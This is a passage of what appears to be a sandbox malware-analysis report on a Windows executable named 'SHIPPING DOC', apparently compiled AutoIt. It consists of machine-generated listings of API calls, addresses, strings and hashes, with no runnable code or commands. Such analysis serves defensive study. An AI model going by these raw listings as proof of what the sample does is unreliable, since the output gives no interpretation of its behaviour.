                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                      • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                      • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                      • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                      • API String ID: 4163708885-3819984048
                                                                                                                      • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                      • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                      • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                      • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                      • API String ID: 0-1896584978
                                                                                                                      • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                      • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                                      • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                      • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll$IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2485277191-404129466
                                                                                                                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                      • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                      • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3869813825-0
                                                                                                                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 00464B28
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                      • _wcslen.LIBCMT ref: 00464C28
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                      • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                      • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                      • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                      • String ID: D
                                                                                                                      • API String ID: 1914653954-2746444292
                                                                                                                      • Opcode ID: 5f72559f0a2586b771b9af551f03c1fb97e064fdb306134380bfcbf6c4a29eaa
                                                                                                                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                      • Opcode Fuzzy Hash: 5f72559f0a2586b771b9af551f03c1fb97e064fdb306134380bfcbf6c4a29eaa
                                                                                                                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll
                                                                                                                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                      • API String ID: 3832890014-4202584635
                                                                                                                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                      • GetFocus.USER32 ref: 0046A0DD
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$CtrlFocus
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1534620443-4108050209
                                                                                                                      • Opcode ID: 69f57c1da7d99aaf19a54cb3f0377e1430f34c496c45dabe130679879bb200d9
                                                                                                                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                      • Opcode Fuzzy Hash: 69f57c1da7d99aaf19a54cb3f0377e1430f34c496c45dabe130679879bb200d9
                                                                                                                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateDestroy
                                                                                                                      • String ID: ,$tooltips_class32
                                                                                                                      • API String ID: 1109047481-3856767331
                                                                                                                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                      APIs
                                                                                                                      • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                      • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                      • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                      • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                      • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                      • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                      • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                      • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1441871840-4108050209
                                                                                                                      • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                      • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                      • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                      • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                      • __swprintf.LIBCMT ref: 00460915
                                                                                                                      • __swprintf.LIBCMT ref: 0046092D
                                                                                                                      • _wprintf.LIBCMT ref: 004609E1
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                      • API String ID: 3631882475-2268648507
                                                                                                                      • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                      • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                      APIs
                                                                                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                      • SendMessageW.USER32 ref: 00471740
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                      • SendMessageW.USER32 ref: 0047184F
                                                                                                                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4116747274-0
                                                                                                                      • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                      • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                      • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                      • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                                      • _wcslen.LIBCMT ref: 00461683
                                                                                                                      • __swprintf.LIBCMT ref: 00461721
                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                      • GetParent.USER32(?), ref: 004618C3
                                                                                                                      • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                      • String ID: %s%u
                                                                                                                      • API String ID: 1899580136-679674701
                                                                                                                      • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                      • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
